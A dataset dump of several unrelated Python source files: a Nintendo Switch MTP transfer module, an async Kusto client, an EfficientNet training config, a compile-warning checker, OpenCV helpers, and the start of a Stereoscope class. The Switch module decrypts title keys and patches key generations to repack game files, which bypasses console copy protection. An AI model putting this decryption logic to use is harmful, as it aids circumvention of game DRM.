id
stringlengths 3
8
| content
stringlengths 100
981k
|
|---|---|
1619008
|
import aes128
import Print
import os
import shutil
import json
import listmanager
from Fs import Nsp as squirrelNSP
from Fs import Xci as squirrelXCI
from Fs import factory
from Fs.Nca import NcaHeader
from Fs import Nca
from Fs.File import MemoryFile
from Fs import Ticket
import sq_tools
import io
from Fs import Type as FsType
import Keys
from binascii import hexlify as hx, unhexlify as uhx
from DBmodule import Exchange as exchangefile
import math
import subprocess
import sys
from mtp.wpd import is_switch_connected
from python_pick import pick
from python_pick import Picker
import csv
from tqdm import tqdm
import Print
def check_connection():
if not is_switch_connected():
sys.exit("Switch device isn't connected.\nCheck if mtp responder is running!!!")
bucketsize = 81920
# SET ENVIRONMENT
squirrel_dir=os.path.abspath(os.curdir)
NSCB_dir=os.path.abspath('../'+(os.curdir))
if os.path.exists(os.path.join(squirrel_dir,'ztools')):
NSCB_dir=squirrel_dir
zconfig_dir=os.path.join(NSCB_dir, 'zconfig')
ztools_dir=os.path.join(NSCB_dir,'ztools')
squirrel_dir=ztools_dir
elif os.path.exists(os.path.join(NSCB_dir,'ztools')):
squirrel_dir=squirrel_dir
ztools_dir=os.path.join(NSCB_dir, 'ztools')
zconfig_dir=os.path.join(NSCB_dir, 'zconfig')
else:
ztools_dir=os.path.join(NSCB_dir, 'ztools')
zconfig_dir=os.path.join(NSCB_dir, 'zconfig')
testroute1=os.path.join(squirrel_dir, "squirrel.py")
testroute2=os.path.join(squirrel_dir, "squirrel.exe")
urlconfig=os.path.join(zconfig_dir,'NUT_DB_URL.txt')
isExe=False
if os.path.exists(testroute1):
squirrel=testroute1
isExe=False
elif os.path.exists(testroute2):
squirrel=testroute2
isExe=True
bin_folder=os.path.join(ztools_dir, 'bin')
nscb_mtp=os.path.join(bin_folder, 'nscb_mtp.exe')
cachefolder=os.path.join(ztools_dir, '_mtp_cache_')
if not os.path.exists(cachefolder):
os.makedirs(cachefolder)
games_installed_cache=os.path.join(cachefolder, 'games_installed.txt')
valid_saves_cache=os.path.join(cachefolder, 'valid_saves.txt')
mtp_source_lib=os.path.join(zconfig_dir,'mtp_source_libraries.txt')
mtp_internal_lib=os.path.join(zconfig_dir,'mtp_SD_libraries.txt')
storage_info=os.path.join(cachefolder, 'storage.csv')
download_lib_file = os.path.join(zconfig_dir, 'mtp_download_libraries.txt')
def get_header_size(flist):
properheadsize=0;sz=0;total_list=[]
for filepath in flist:
if filepath.endswith('xci') or filepath.endswith('xcz'):
files_list=sq_tools.ret_xci_offsets(filepath)
joined_list = [*total_list, *files_list]
total_list=joined_list
files=list();filesizes=list()
fplist=list()
for k in range(len(files_list)):
entry=files_list[k]
fplist.append(entry[0])
for i in range(len(files_list)):
entry=files_list[i]
cnmtfile=entry[0]
if cnmtfile.endswith('.cnmt.nca'):
f=squirrelXCI(filepath)
titleid,titleversion,base_ID,keygeneration,rightsId,RSV,RGV,ctype,metasdkversion,exesdkversion,hasHtmlManual,Installedsize,DeltaSize,ncadata=f.get_data_from_cnmt(cnmtfile)
for j in range(len(ncadata)):
row=ncadata[j]
# print(row)
if row['NCAtype']!='Meta':
test1=str(row['NcaId'])+'.nca';test2=str(row['NcaId'])+'.ncz'
if test1 in fplist or test2 in fplist:
# print(str(row['NcaId'])+'.nca')
files.append(str(row['NcaId'])+'.nca')
filesizes.append(int(row['Size']))
sz+=int(row['Size'])
elif row['NCAtype']=='Meta':
# print(str(row['NcaId'])+'.cnmt.nca')
files.append(str(row['NcaId'])+'.cnmt.nca')
filesizes.append(int(row['Size']))
sz+=int(row['Size'])
sec_hashlist=list()
try:
for file in files:
sha,size,gamecard=f.file_hash(file)
# print(sha)
if sha != False:
sec_hashlist.append(sha)
except BaseException as e:
Print.error('Exception: ' + str(e))
f.flush()
f.close()
xci_header,game_info,sig_padding,xci_certificate,root_header,upd_header,norm_header,sec_header,rootSize,upd_multiplier,norm_multiplier,sec_multiplier=sq_tools.get_xciheader(files,filesizes,sec_hashlist)
outheader=xci_header
outheader+=game_info
outheader+=sig_padding
outheader+=xci_certificate
outheader+=root_header
outheader+=upd_header
outheader+=norm_header
outheader+=sec_header
elif filepath.endswith('nsp') or filepath.endswith('nsz'):
files_list=sq_tools.ret_nsp_offsets(filepath)
joined_list = [*total_list, *files_list]
total_list=joined_list
files=list();filesizes=list()
fplist=list()
for k in range(len(files_list)):
entry=files_list[k]
fplist.append(entry[0])
for i in range(len(files_list)):
entry=files_list[i]
cnmtfile=entry[0]
if cnmtfile.endswith('.cnmt.nca'):
f=squirrelNSP(filepath)
titleid,titleversion,base_ID,keygeneration,rightsId,RSV,RGV,ctype,metasdkversion,exesdkversion,hasHtmlManual,Installedsize,DeltaSize,ncadata=f.get_data_from_cnmt(cnmtfile)
for j in range(len(ncadata)):
row=ncadata[j]
# print(row)
if row['NCAtype']!='Meta':
test1=str(row['NcaId'])+'.nca';test2=str(row['NcaId'])+'.ncz'
if test1 in fplist or test2 in fplist:
# print(str(row['NcaId'])+'.nca')
files.append(str(row['NcaId'])+'.nca')
filesizes.append(int(row['Size']))
sz+=int(row['Size'])
elif row['NCAtype']=='Meta':
# print(str(row['NcaId'])+'.cnmt.nca')
files.append(str(row['NcaId'])+'.cnmt.nca')
filesizes.append(int(row['Size']))
sz+=int(row['Size'])
try:
sec_hashlist=list()
# print(files)
for file in files:
sha,size,gamecard=f.file_hash(file)
# print(sha)
if sha != False:
sec_hashlist.append(sha)
except BaseException as e:
Print.error('Exception: ' + str(e))
f.flush()
f.close()
xci_header,game_info,sig_padding,xci_certificate,root_header,upd_header,norm_header,sec_header,rootSize,upd_multiplier,norm_multiplier,sec_multiplier=sq_tools.get_xciheader(files,filesizes,sec_hashlist)
outheader=xci_header
outheader+=game_info
outheader+=sig_padding
outheader+=xci_certificate
outheader+=root_header
outheader+=upd_header
outheader+=norm_header
outheader+=sec_header
properheadsize=len(outheader)
return outheader,properheadsize,keygeneration,sz,files,total_list
def transfer_xci_csv(filepath,destiny="SD",cachefolder=None,override=False,keypatch=False):
check_connection()
if destiny=="SD":
destiny="1: External SD Card\\"
if cachefolder==None:
cachefolder=os.path.join(ztools_dir, '_mtp_cache_')
print(f"Creating xci for {filepath}")
xciname=gen_xci_parts(filepath,cachefolder=cachefolder,keypatch=keypatch)
destinypath=os.path.join(destiny,xciname)
files_csv=os.path.join(cachefolder, 'files.csv')
process=subprocess.Popen([nscb_mtp,"TransferfromCSV","-cs",files_csv,"-dst",destinypath])
while process.poll()==None:
if process.poll()!=None:
process.terminate();
if os.path.exists(cachefolder):
for f in os.listdir(cachefolder):
fp = os.path.join(cachefolder, f)
try:
shutil.rmtree(fp)
except OSError:
os.remove(fp)
def gen_xci_parts(filepath,cachefolder=None,keypatch=False):
if keypatch!=False:
try:
keypatch=int(keypatch)
except: keypatch=False
if cachefolder==None:
cachefolder=os.path.join(ztools_dir, '_mtp_cache_')
if not os.path.exists(cachefolder):
os.makedirs(cachefolder)
else:
for f in os.listdir(cachefolder):
fp = os.path.join(cachefolder, f)
try:
shutil.rmtree(fp)
except OSError:
os.remove(fp)
outheader,properheadsize,keygeneration,sz,files,files_list=get_header_size([filepath])
properheadsize=len(outheader)
# print(properheadsize)
# print(bucketsize)
i=0;sum=properheadsize;
if filepath.endswith('xci'):
xci=squirrelXCI(filepath)
outfile=os.path.join(cachefolder, "0")
outf = open(outfile, 'w+b')
outf.write(outheader)
written=0
for fi in files:
for nspF in xci.hfs0:
if str(nspF._path)=="secure":
for nca in nspF:
if nca._path==fi:
nca=Nca(nca)
crypto1=nca.header.getCryptoType()
crypto2=nca.header.getCryptoType2()
if crypto2>crypto1:
masterKeyRev=crypto2
if crypto2<=crypto1:
masterKeyRev=crypto1
crypto = aes128.AESECB(Keys.keyAreaKey(Keys.getMasterKeyIndex(masterKeyRev), nca.header.keyIndex))
hcrypto = aes128.AESXTS(uhx(Keys.get('header_key')))
gc_flag='00'*0x01
crypto1=nca.header.getCryptoType()
crypto2=nca.header.getCryptoType2()
if nca.header.getRightsId() != 0:
nca.rewind()
if crypto2>crypto1:
masterKeyRev=crypto2
if crypto2<=crypto1:
masterKeyRev=crypto1
from mtp_tools import get_nca_ticket
check,titleKey=get_nca_ticket(filepath,fi)
if check==False:
sys.exit("Can't verify titleckey")
titleKeyDec = Keys.decryptTitleKey(titleKey, Keys.getMasterKeyIndex(int(masterKeyRev)))
encKeyBlock = crypto.encrypt(titleKeyDec * 4)
if str(keypatch) != "False":
t = tqdm(total=False, unit='B', unit_scale=False, leave=False)
if keypatch < nca.header.getCryptoType2():
encKeyBlock,crypto1,crypto2=squirrelXCI.get_new_cryptoblock(squirrelXCI,nca,keypatch,encKeyBlock,t)
t.close()
if nca.header.getRightsId() == 0:
nca.rewind()
encKeyBlock = nca.header.getKeyBlock()
if str(keypatch) != "False":
t = tqdm(total=False, unit='B', unit_scale=False, leave=False)
if keypatch < nca.header.getCryptoType2():
encKeyBlock,crypto1,crypto2=squirrelXCI.get_new_cryptoblock(squirrelXCI,nca,keypatch,encKeyBlock,t)
t.close()
nca.rewind()
i=0
newheader=xci.get_newheader(nca,encKeyBlock,crypto1,crypto2,hcrypto,gc_flag)
outf.write(newheader)
written+=len(newheader)
nca.seek(0xC00)
break
else:pass
xci.flush()
xci.close()
elif filepath.endswith('nsp'):
nsp=squirrelNSP(filepath)
outfile=os.path.join(cachefolder, "0")
outf = open(outfile, 'w+b')
outf.write(outheader)
written=0
for fi in files:
for nca in nsp:
if nca._path==fi:
nca=Nca(nca)
crypto1=nca.header.getCryptoType()
crypto2=nca.header.getCryptoType2()
if crypto2>crypto1:
masterKeyRev=crypto2
if crypto2<=crypto1:
masterKeyRev=crypto1
crypto = aes128.AESECB(Keys.keyAreaKey(Keys.getMasterKeyIndex(masterKeyRev), nca.header.keyIndex))
hcrypto = aes128.AESXTS(uhx(Keys.get('header_key')))
gc_flag='00'*0x01
crypto1=nca.header.getCryptoType()
crypto2=nca.header.getCryptoType2()
if nca.header.getRightsId() != 0:
nca.rewind()
if crypto2>crypto1:
masterKeyRev=crypto2
if crypto2<=crypto1:
masterKeyRev=crypto1
from mtp_tools import get_nca_ticket
check,titleKey=get_nca_ticket(filepath,fi)
if check==False:
sys.exit("Can't verify titleckey")
titleKeyDec = Keys.decryptTitleKey(titleKey, Keys.getMasterKeyIndex(int(masterKeyRev)))
encKeyBlock = crypto.encrypt(titleKeyDec * 4)
if str(keypatch) != "False":
t = tqdm(total=False, unit='B', unit_scale=False, leave=False)
if keypatch < nca.header.getCryptoType2():
encKeyBlock,crypto1,crypto2=squirrelNSP.get_new_cryptoblock(squirrelNSP,nca,keypatch,encKeyBlock,t)
t.close()
if nca.header.getRightsId() == 0:
nca.rewind()
encKeyBlock = nca.header.getKeyBlock()
if str(keypatch) != "False":
t = tqdm(total=False, unit='B', unit_scale=False, leave=False)
if keypatch < nca.header.getCryptoType2():
encKeyBlock,crypto1,crypto2=squirrelNSP.get_new_cryptoblock(squirrelNSP,nca,keypatch,encKeyBlock,t)
t.close()
nca.rewind()
i=0
newheader=nsp.get_newheader(nca,encKeyBlock,crypto1,crypto2,hcrypto,gc_flag)
outf.write(newheader)
written+=len(newheader)
nca.seek(0xC00)
break
else:pass
nsp.flush()
nsp.close()
outf.flush()
outf.close()
tfile=os.path.join(cachefolder, "files.csv")
with open(tfile,'w') as csvfile:
csvfile.write("{}|{}|{}|{}|{}|{}\n".format("step","filepath","size","targetsize","off1","off2"))
csvfile.write("{}|{}|{}|{}|{}|{}\n".format(0,outfile,properheadsize+written,properheadsize,0,properheadsize))
k=0;l=0
for fi in files:
for j in files_list:
if j[0]==fi:
csvfile.write("{}|{}|{}|{}|{}|{}\n".format(k+1,outfile,properheadsize+written,0xC00,(properheadsize+l*0xC00),(properheadsize+(l*0xC00)+0xC00)))
off1=j[1]+0xC00
off2=j[2]
targetsize=j[3]-0xC00
csvfile.write("{}|{}|{}|{}|{}|{}\n".format(k+2,filepath,(os.path.getsize(filepath)),targetsize,off1,off2))
break
k+=2;l+=1
xciname="test.xci"
try:
g=os.path.basename(filepath)
xciname=g[:-3]+'xci'
except:pass
return xciname
def transfer_mxci_csv(tfile=None,destiny="SD",cachefolder=None,override=False,keypatch=False,input_files=None):
check_connection()
if input_files==None and tfile==None:
sys.exit("Missing input!!!")
if destiny=="SD":
destiny="1: External SD Card\\"
if cachefolder==None:
cachefolder=os.path.join(ztools_dir, '_mtp_cache_')
if input_files==None:
input_files=listmanager.read_lines_to_list(tfile,all=True)
print(f"Creating mxci from {tfile}")
xciname=gen_mxci_parts(input_files,cachefolder=cachefolder,keypatch=keypatch)
destinypath=os.path.join(destiny,xciname)
files_csv=os.path.join(cachefolder, 'files.csv')
process=subprocess.Popen([nscb_mtp,"TransferfromCSV","-cs",files_csv,"-dst",destinypath])
while process.poll()==None:
if process.poll()!=None:
process.terminate();
if os.path.exists(cachefolder):
for f in os.listdir(cachefolder):
fp = os.path.join(cachefolder, f)
try:
shutil.rmtree(fp)
except OSError:
os.remove(fp)
def gen_multi_file_header(prlist,filelist):
oflist=[];osizelist=[];ototlist=[];files=[]
totSize=0
for i in range(len(prlist)):
for j in prlist[i][4]:
el=j[0]
if el.endswith('.nca'):
oflist.append(j[0])
#print(j[0])
totSize = totSize+j[1]
#print(j[1])
ototlist.append(j[0])
sec_hashlist=list()
GClist=list()
# print(filelist)
for file in oflist:
for filepath in filelist:
if filepath.endswith('.nsp') or filepath.endswith('.nsz'):
try:
f = squirrelNSP(filepath)
sha,size,gamecard=f.file_hash(file)
if sha != False:
sec_hashlist.append(sha)
osizelist.append(size)
GClist.append([file,gamecard])
f.flush()
f.close()
except BaseException as e:
Print.error('Exception: ' + str(e))
if filepath.endswith('.xci') or filepath.endswith('.xcz'):
try:
f = squirrelXCI(filepath)
sha,size,gamecard=f.file_hash(file)
if sha != False:
sec_hashlist.append(sha)
osizelist.append(size)
GClist.append([file,gamecard])
f.flush()
f.close()
except BaseException as e:
Print.error('Exception: ' + str(e))
xci_header,game_info,sig_padding,xci_certificate,root_header,upd_header,norm_header,sec_header,rootSize,upd_multiplier,norm_multiplier,sec_multiplier=sq_tools.get_xciheader(oflist,osizelist,sec_hashlist)
totSize=len(xci_header)+len(game_info)+len(sig_padding)+len(xci_certificate)+rootSize
outheader=xci_header
outheader+=game_info
outheader+=sig_padding
outheader+=xci_certificate
outheader+=root_header
outheader+=upd_header
outheader+=norm_header
outheader+=sec_header
properheadsize=len(outheader)
return outheader,properheadsize,totSize,oflist
def gen_mxci_parts(input_files,cachefolder=None,keypatch=False):
from listmanager import calculate_name
if keypatch!=False:
try:
keypatch=int(keypatch)
except: keypatch=False
if cachefolder==None:
cachefolder=os.path.join(ztools_dir, '_mtp_cache_')
if not os.path.exists(cachefolder):
os.makedirs(cachefolder)
else:
for f in os.listdir(cachefolder):
fp = os.path.join(cachefolder, f)
try:
shutil.rmtree(fp)
except OSError:
os.remove(fp)
end_name,prlist=calculate_name(input_files,romanize=True,ext='.xci')
print(f"Calculated name {end_name}")
outheader,properheadsize,sz,files=gen_multi_file_header(prlist,input_files)
properheadsize=len(outheader)
outfile=os.path.join(cachefolder, "0")
outf = open(outfile, 'w+b')
outf.write(outheader)
# print(properheadsize)
# print(bucketsize)
i=0;sum=properheadsize;
for fi in files:
for filepath in input_files:
if filepath.endswith('xci'):
xci=squirrelXCI(filepath)
written=0
for nspF in xci.hfs0:
if str(nspF._path)=="secure":
for nca in nspF:
if nca._path==fi:
nca=Nca(nca)
crypto1=nca.header.getCryptoType()
crypto2=nca.header.getCryptoType2()
if crypto2>crypto1:
masterKeyRev=crypto2
if crypto2<=crypto1:
masterKeyRev=crypto1
crypto = aes128.AESECB(Keys.keyAreaKey(Keys.getMasterKeyIndex(masterKeyRev), nca.header.keyIndex))
hcrypto = aes128.AESXTS(uhx(Keys.get('header_key')))
gc_flag='00'*0x01
crypto1=nca.header.getCryptoType()
crypto2=nca.header.getCryptoType2()
if nca.header.getRightsId() != 0:
nca.rewind()
if crypto2>crypto1:
masterKeyRev=crypto2
if crypto2<=crypto1:
masterKeyRev=crypto1
from mtp_tools import get_nca_ticket
check,titleKey=get_nca_ticket(filepath,fi)
if check==False:
sys.exit("Can't verify titleckey")
titleKeyDec = Keys.decryptTitleKey(titleKey, Keys.getMasterKeyIndex(int(masterKeyRev)))
encKeyBlock = crypto.encrypt(titleKeyDec * 4)
if str(keypatch) != "False":
t = tqdm(total=False, unit='B', unit_scale=False, leave=False)
if keypatch < nca.header.getCryptoType2():
encKeyBlock,crypto1,crypto2=squirrelXCI.get_new_cryptoblock(squirrelXCI,nca,keypatch,encKeyBlock,t)
t.close()
if nca.header.getRightsId() == 0:
nca.rewind()
encKeyBlock = nca.header.getKeyBlock()
if str(keypatch) != "False":
t = tqdm(total=False, unit='B', unit_scale=False, leave=False)
if keypatch < nca.header.getCryptoType2():
encKeyBlock,crypto1,crypto2=squirrelXCI.get_new_cryptoblock(squirrelXCI,nca,keypatch,encKeyBlock,t)
t.close()
nca.rewind()
i=0
newheader=xci.get_newheader(nca,encKeyBlock,crypto1,crypto2,hcrypto,gc_flag)
outf.write(newheader)
written+=len(newheader)
nca.seek(0xC00)
break
else:pass
xci.flush()
xci.close()
elif filepath.endswith('nsp'):
nsp=squirrelNSP(filepath)
written=0
for nca in nsp:
if nca._path==fi:
nca=Nca(nca)
crypto1=nca.header.getCryptoType()
crypto2=nca.header.getCryptoType2()
if crypto2>crypto1:
masterKeyRev=crypto2
if crypto2<=crypto1:
masterKeyRev=crypto1
crypto = aes128.AESECB(Keys.keyAreaKey(Keys.getMasterKeyIndex(masterKeyRev), nca.header.keyIndex))
hcrypto = aes128.AESXTS(uhx(Keys.get('header_key')))
gc_flag='00'*0x01
crypto1=nca.header.getCryptoType()
crypto2=nca.header.getCryptoType2()
if nca.header.getRightsId() != 0:
nca.rewind()
if crypto2>crypto1:
masterKeyRev=crypto2
if crypto2<=crypto1:
masterKeyRev=crypto1
from mtp_tools import get_nca_ticket
check,titleKey=get_nca_ticket(filepath,fi)
if check==False:
sys.exit("Can't verify titleckey")
titleKeyDec = Keys.decryptTitleKey(titleKey, Keys.getMasterKeyIndex(int(masterKeyRev)))
encKeyBlock = crypto.encrypt(titleKeyDec * 4)
if str(keypatch) != "False":
t = tqdm(total=False, unit='B', unit_scale=False, leave=False)
if keypatch < nca.header.getCryptoType2():
encKeyBlock,crypto1,crypto2=squirrelNSP.get_new_cryptoblock(squirrelNSP,nca,keypatch,encKeyBlock,t)
t.close()
if nca.header.getRightsId() == 0:
nca.rewind()
encKeyBlock = nca.header.getKeyBlock()
if str(keypatch) != "False":
t = tqdm(total=False, unit='B', unit_scale=False, leave=False)
if keypatch < nca.header.getCryptoType2():
encKeyBlock,crypto1,crypto2=squirrelNSP.get_new_cryptoblock(squirrelNSP,nca,keypatch,encKeyBlock,t)
t.close()
nca.rewind()
i=0
newheader=nsp.get_newheader(nca,encKeyBlock,crypto1,crypto2,hcrypto,gc_flag)
outf.write(newheader)
written+=len(newheader)
nca.seek(0xC00)
break
else:pass
nsp.flush()
nsp.close()
outf.flush()
outf.close()
tfile=os.path.join(cachefolder, "files.csv")
with open(tfile,'w') as csvfile:
csvfile.write("{}|{}|{}|{}|{}|{}\n".format("step","filepath","size","targetsize","off1","off2"))
csvfile.write("{}|{}|{}|{}|{}|{}\n".format(0,outfile,properheadsize+written,properheadsize,0,properheadsize))
k=0;l=0
for fi in files:
for filepath in input_files:
if filepath.endswith('xci'):
files_list=sq_tools.ret_xci_offsets(filepath)
elif filepath.endswith('nsp'):
files_list=sq_tools.ret_nsp_offsets(filepath)
for j in files_list:
if j[0]==fi:
csvfile.write("{}|{}|{}|{}|{}|{}\n".format(k+1,outfile,properheadsize+written,0xC00,(properheadsize+l*0xC00),(properheadsize+(l*0xC00)+0xC00)))
off1=j[1]+0xC00
off2=j[2]
targetsize=j[3]-0xC00
csvfile.write("{}|{}|{}|{}|{}|{}\n".format(k+2,filepath,(os.path.getsize(filepath)),targetsize,off1,off2))
break
k+=2;l+=1
return end_name
|
1619041
|
import io
from datetime import timedelta
from typing import Union, Optional
from .response import KustoStreamingResponseDataSet
from .._decorators import documented_by, aio_documented_by
from ..aio.streaming_response import StreamingDataSetEnumerator, JsonTokenReader
from ..client import KustoClient as KustoClientSync, _KustoClientBase, KustoConnectionStringBuilder, ClientRequestProperties, ExecuteRequestParams
from ..data_format import DataFormat
from ..exceptions import KustoAioSyntaxError
from ..response import KustoResponseDataSet
from ..security import _AadHelper
try:
from aiohttp import ClientResponse, ClientSession
except ImportError:
raise KustoAioSyntaxError()
@documented_by(KustoClientSync)
class KustoClient(_KustoClientBase):
@documented_by(KustoClientSync.__init__)
def __init__(self, kcsb: Union[KustoConnectionStringBuilder, str]):
super().__init__(kcsb)
# notice that in this context, federated actually just stands for add auth, not aad federated auth (legacy code)
self._auth_provider = _AadHelper(self._kcsb, is_async=True) if self._kcsb.aad_federated_security else None
self._session = ClientSession()
async def __aenter__(self) -> "KustoClient":
return self
def __aexit__(self, exc_type, exc_val, exc_tb):
return self._session.__aexit__(exc_type, exc_val, exc_tb)
@aio_documented_by(KustoClientSync.execute)
async def execute(self, database: str, query: str, properties: ClientRequestProperties = None) -> KustoResponseDataSet:
query = query.strip()
if query.startswith("."):
return await self.execute_mgmt(database, query, properties)
return await self.execute_query(database, query, properties)
@aio_documented_by(KustoClientSync.execute_query)
async def execute_query(self, database: str, query: str, properties: ClientRequestProperties = None) -> KustoResponseDataSet:
return await self._execute(self._query_endpoint, database, query, None, KustoClient._query_default_timeout, properties)
@aio_documented_by(KustoClientSync.execute_mgmt)
async def execute_mgmt(self, database: str, query: str, properties: ClientRequestProperties = None) -> KustoResponseDataSet:
return await self._execute(self._mgmt_endpoint, database, query, None, KustoClient._mgmt_default_timeout, properties)
@aio_documented_by(KustoClientSync.execute_streaming_ingest)
async def execute_streaming_ingest(
self,
database: str,
table: str,
stream: io.IOBase,
stream_format: Union[DataFormat, str],
properties: ClientRequestProperties = None,
mapping_name: str = None,
):
stream_format = stream_format.kusto_value if isinstance(stream_format, DataFormat) else DataFormat[stream_format.upper()].kusto_value
endpoint = self._streaming_ingest_endpoint + database + "/" + table + "?streamFormat=" + stream_format
if mapping_name is not None:
endpoint = endpoint + "&mappingName=" + mapping_name
await self._execute(endpoint, database, None, stream, self._streaming_ingest_default_timeout, properties)
@aio_documented_by(KustoClientSync._execute_streaming_query_parsed)
async def _execute_streaming_query_parsed(
self, database: str, query: str, timeout: timedelta = _KustoClientBase._query_default_timeout, properties: Optional[ClientRequestProperties] = None
) -> StreamingDataSetEnumerator:
response = await self._execute(self._query_endpoint, database, query, None, timeout, properties, stream_response=True)
return StreamingDataSetEnumerator(JsonTokenReader(response.content))
@aio_documented_by(KustoClientSync.execute_streaming_query)
async def execute_streaming_query(
self, database: str, query: str, timeout: timedelta = _KustoClientBase._query_default_timeout, properties: Optional[ClientRequestProperties] = None
) -> KustoStreamingResponseDataSet:
response = await self._execute_streaming_query_parsed(database, query, timeout, properties)
return KustoStreamingResponseDataSet(response)
@aio_documented_by(KustoClientSync._execute)
async def _execute(
self,
endpoint: str,
database: str,
query: Optional[str],
payload: Optional[io.IOBase],
timeout: timedelta,
properties: ClientRequestProperties = None,
stream_response: bool = False,
) -> Union[KustoResponseDataSet, ClientResponse]:
"""Executes given query against this client"""
request_params = ExecuteRequestParams(database, payload, properties, query, timeout, self._request_headers)
json_payload = request_params.json_payload
request_headers = request_params.request_headers
timeout = request_params.timeout
if self._auth_provider:
request_headers["Authorization"] = await self._auth_provider.acquire_authorization_header_async()
response = await self._session.post(endpoint, headers=request_headers, data=payload, json=json_payload, timeout=timeout.seconds)
if stream_response:
try:
response.raise_for_status()
return response
except Exception as e:
try:
response_text = await response.text()
except Exception:
response_text = None
try:
response_json = await response.json()
except Exception:
response_json = None
raise self._handle_http_error(e, endpoint, payload, response, response.status, response_json, response_text)
async with response:
response_json = None
try:
response_json = await response.json()
response.raise_for_status()
except Exception as e:
try:
response_text = await response.text()
except Exception:
response_text = None
raise self._handle_http_error(e, endpoint, payload, response, response.status, response_json, response_text)
return self._kusto_parse_by_endpoint(endpoint, response_json)
|
1619082
|
import os
import sys
BASE_DIR = os.path.dirname(
os.path.dirname(os.path.dirname(os.path.dirname(
os.path.abspath(__file__)))))
sys.path.append(BASE_DIR)
from tools.path import ILSVRC2012_path
from simpleAICV.classification import backbones
from simpleAICV.classification import losses
import torchvision.transforms as transforms
import torchvision.datasets as datasets
class config:
train_dataset_path = os.path.join(ILSVRC2012_path, 'train')
val_dataset_path = os.path.join(ILSVRC2012_path, 'val')
network = 'efficientnet_b0'
pretrained = False
num_classes = 1000
input_image_size = 224
scale = 256 / 224
model = backbones.__dict__[network](**{
'pretrained': pretrained,
'num_classes': num_classes,
})
criterion = losses.__dict__['CELoss']()
train_dataset = datasets.ImageFolder(
train_dataset_path,
transforms.Compose([
transforms.RandomResizedCrop(input_image_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
]))
val_dataset = datasets.ImageFolder(
val_dataset_path,
transforms.Compose([
transforms.Resize(int(input_image_size * scale)),
transforms.CenterCrop(input_image_size),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
]))
# val_dataset.class_to_idx保存了类别对应的索引,所谓类别即每个子类文件夹的名字,索引即模型训练时的target
seed = 0
# batch_size is total size in DataParallel mode
# batch_size is per gpu node size in DistributedDataParallel mode
batch_size = 64
num_workers = 16
# choose 'SGD' or 'AdamW'
optimizer = 'SGD'
# 'AdamW' doesn't need gamma and momentum variable
gamma = 0.1
momentum = 0.9
# choose 'MultiStepLR' or 'CosineLR'
# milestones only use in 'MultiStepLR'
scheduler = 'CosineLR'
lr = 0.1
weight_decay = 1e-4
milestones = [30, 60]
warm_up_epochs = 5
epochs = 90
accumulation_steps = 1
print_interval = 10
# only in DistributedDataParallel mode can use sync_bn
distributed = True
sync_bn = False
apex = True
|
1619088
|
import os, sys
sys.path.append(os.path.realpath(os.path.dirname(__file__)))
import reaper_pp
import glm_pp
|
1619098
|
import sys
import subprocess
import re
pal_warn = re.compile("Warning.*pal")
pal_dont_treat_as_warn = re.compile("Warning.*PAL_INSECURE")
proc = subprocess.Popen(sys.argv[1].split(), stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
for line in proc.stdout:
print line
if len(pal_warn.findall(line)) > 0:
if not len(pal_dont_treat_as_warn.findall(line)) > 0:
raise Exception("No Warnings Allowed in Pal")
proc.wait()
print "mbed compile returned {}".format(proc.returncode)
if not proc.returncode == 0:
raise Exception("mbed compile failed")
|
1619103
|
import numpy as np
from deep_utils.utils.box_utils.boxes import Point
class VideoWriterCV:
def __init__(self, save_path, width, height, fourcc="XVID", fps=30, colorful=True, in_source='Numpy'):
import cv2
point = Point.point2point((width, height), in_source=in_source, to_source=Point.PointSource.CV)
fourcc = cv2.VideoWriter_fourcc(*fourcc) if isinstance(fourcc, str) else fourcc
self.vw = cv2.VideoWriter(save_path, fourcc, fps, point, colorful)
def write(self, frame):
self.vw.write(frame)
def rotate(img, rotation_degree, center_point=None, scale=1.0, dsize=None, bound=False, clockwise=True):
import cv2
h, w = img.shape[:2]
(w, h) = dsize = (w, h) if dsize is None else dsize
center_point = (w // 2, h // 2) if center_point is None else center_point
# negative angle >> clockwise rotation | positive angle >> counter clockwise rotation
rotation_degree = -rotation_degree if clockwise else rotation_degree
m = cv2.getRotationMatrix2D(center_point, rotation_degree, scale)
if bound:
h, w = img.shape[:2]
cos = abs(m[0, 0])
sin = abs(m[0, 1])
w_ = int((cos * w) + (sin * h))
h_ = int((cos * h) + (sin * w))
m[0, 2] += w_ // 2 - w // 2
m[1, 2] += h_ // 2 - h // 2
dsize = (w_, h_)
rotated = cv2.warpAffine(img, m, dsize)
return rotated
def translate(img, tx, ty, dsize=None):
import cv2
h, w = img.shape[:2][::-1]
dsize = (w, h) if dsize is None else dsize
translation_matrix = np.array([
[1, 0, tx],
[0, 1, ty]], dtype=np.float32)
translated_image = cv2.warpAffine(src=img, M=translation_matrix, dsize=dsize)
return translated_image
def show_destroy_cv2(img, win_name=''):
import cv2
try:
cv2.imshow(win_name, img)
cv2.waitKey(0)
cv2.destroyWindow(win_name)
except Exception as e:
cv2.destroyWindow(win_name)
raise e
|
1619111
|
import logging
from typing import Optional, Tuple, Union
import numpy as np
import pandas as pd
import torch
from anndata import AnnData
from scvi import REGISTRY_KEYS
from scvi._compat import Literal
from scvi.data import AnnDataManager
from scvi.data.fields import CategoricalObsField, LayerField, NumericalObsField
from scvi.external.stereoscope._module import RNADeconv, SpatialDeconv
from scvi.model.base import BaseModelClass, UnsupervisedTrainingMixin
from scvi.utils import setup_anndata_dsp
logger = logging.getLogger(__name__)
class RNAStereoscope(UnsupervisedTrainingMixin, BaseModelClass):
"""
Reimplementation of Stereoscope [Andersson20]_ for deconvolution of spatial transcriptomics from single-cell transcriptomics.
https://github.com/almaan/stereoscope.
Parameters
----------
sc_adata
single-cell AnnData object that has been registered via :meth:`~scvi.external.RNAStereoscope.setup_anndata`.
**model_kwargs
Keyword args for :class:`~scvi.external.stereoscope.RNADeconv`
Examples
--------
>>> sc_adata = anndata.read_h5ad(path_to_sc_anndata)
>>> scvi.external.RNAStereoscope.setup_anndata(sc_adata, labels_key="labels")
>>> stereo = scvi.external.stereoscope.RNAStereoscope(sc_adata)
>>> stereo.train()
"""
def __init__(
self,
sc_adata: AnnData,
**model_kwargs,
):
super(RNAStereoscope, self).__init__(sc_adata)
self.n_genes = self.summary_stats.n_vars
self.n_labels = self.summary_stats.n_labels
